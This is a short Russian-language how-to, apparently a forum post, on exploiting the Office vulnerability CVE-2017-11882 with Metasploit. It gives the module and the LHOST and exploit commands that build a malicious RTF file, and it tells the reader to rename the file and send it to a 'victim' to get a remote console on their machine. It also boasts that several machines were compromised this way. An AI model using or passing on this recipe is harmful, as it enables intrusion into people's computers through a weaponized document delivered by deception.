Cve-2017-11882

Загружаем msfconsole

используем

 use exploit/windows/fileformat/office_ms17_11882

LHOST вводим наш локальный IP

set LHOST local.ip

exploit

получаем файлик  /root/.msf4/local/msf.rtf

если все делаете на wsl то забираем его из

C:\Users\%USERNAME%\AppData\Local\Packages\KaliLinux.хрень.хрень.хрень\LocalState\rootfs\root\.msf4\local\msf.rtf

называем его как нам нравится)))

передаем жертве, в итоге получаем консолю юзверя)))

уязвимость старовата, но все же часто подходит для простого пентеста!

не одна и даже не две машины полегло после такого)